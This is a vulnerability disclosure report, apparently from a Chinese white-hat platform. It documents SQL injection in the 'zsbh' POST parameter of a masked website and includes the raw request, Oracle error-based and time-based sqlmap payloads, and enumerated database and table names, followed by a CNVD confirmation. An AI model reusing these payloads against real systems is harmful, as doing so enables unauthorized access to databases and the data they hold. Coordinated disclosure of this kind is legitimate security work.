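2015-10-12: Details reported to the vendor; awaiting vendor handling
2015-10-16: Vendor confirmed; details disclosed to the vendor only
2015-10-26: Details disclosed to core white hats and experts in the relevant field
2015-11-05: Details disclosed to regular white hats
2015-11-15: Details disclosed to intern white hats
2015-11-30: Details disclosed to the public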
As the title says.
POST /byzscx/result.jsp HTTP/1.1
Content-Length: 94
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: JSESSIONID=CCA85540142478428AC5287E772976F6.server99; voted_time=2015-10-6; CNZZDATA3061020=cnzz_eid%3D1623658040-1444484727-http%253A%252F%252F**.**.**.**%252F%26ntime%3D1444484727; looyu_id=c6ebf52265e02063df3ae0402f946a63b0_11267%3A1; looyu_11267=v%3Ac6ebf52265e02063df3ae0402f946a63b0%2Cref%3Ahttp%253A//**.**.**.**/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//**.**.**.**/monitor; _gscu_169170879=444847250368ki10; _gscs_169170879=44484725azwwiq10|pv:1; _gscbrs_169170879=1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Submit=%b2%e9%20%20%d1%af&xm=1&yzm=1&zsbh=*
The zsbh parameter is vulnerable to injection.
sqlmap identified the following injection point(s) with a total of 190 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: Submit=%b2%e9 %d1%af&xm=1&yzm=1&zsbh=' AND 8782=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(112)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (8782=8782) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'qDKo'='qDKo

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: Submit=%b2%e9 %d1%af&xm=1&yzm=1&zsbh=' AND 3820=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'rYwW'='rYwW
---
back-end DBMS: Oracle
back-end DBMS: Oracle
available databases [49]:
[*] CTXSYS
[*] DAGL
[*] DAGLBASE
[*] DJYXXGL
[*] DYGL
[*] ECMS22_APP_USER
[*] ECMS_APP_USER
[*] HR
[*] JOBNET
[*] LNJYOA
[*] LNJYYJS
[*] LNJYZZ
[*] LNSZ
[*] MARKET
[*] MDSYS
[*] NEWS
[*] NEWSUT
[*] OA42
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] OLDLNJYOA
[*] ORDSYS
[*] OUTLN
[*] PKSTZ
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] QZDJB
[*] RSGL2
[*] SCOTT
[*] SH
[*] SXPX
[*] SYS
[*] SYSTEM
[*] SZLJS
[*] TGJH
[*] VOTE
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XLRZ
[*] YCX
[*] ZSJY
Pick one of the databases to see whether its tables can be listed.
back-end DBMS: Oracle
Database: LNJYZZ
[37 tables]
+----------------------+
| BAS_BYNF             |
| BAS_BYNF_UNITE       |
| COMBIN1              |
| CON_BASE             |
| CON_SET              |
| DM_ADMIN             |
| MEMBERS              |
| MOE_TASK_TABLE       |
| PLAN_TABLE           |
| RS_GWGLXX            |
| RS_RYGWGL            |
| RS_RYJBXX            |
| RS_ZZJG              |
| SEARCH_PART          |
| SEARCH_PART_RELATE   |
| SEARCH_TYPE          |
| SERVERMSG            |
| SJZD_FL              |
| SJZD_LB              |
| SJZD_XM              |
| SWBDZBZ_CONDITION    |
| SWBDZBZ_CON_STR      |
| SYSTEM               |
| SYSTEM_ROLE          |
| SYSTEM_ROLE_FUNCTION |
| TABLE_MSG            |
| TABLE_STRMSG         |
| TMODE                |
| TMODE_STR            |
| T_DM                 |
| T_DM_HT              |
| T_DM_TEMP            |
| VALIDATOR_RULES      |
| YXFP                 |
| YXFP_PERSON          |
| YX_CERTIFY           |
| YX_XX                |
+----------------------+
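Severity: High
Vulnerability Rank: 10
Confirmed: 2015-10-16 14:24
CNVD has confirmed and reproduced the reported vulnerability and has passed it to CNCERT for dispatch to the corresponding branch center, which will coordinate follow-up handling with the organization that manages the website.
None yet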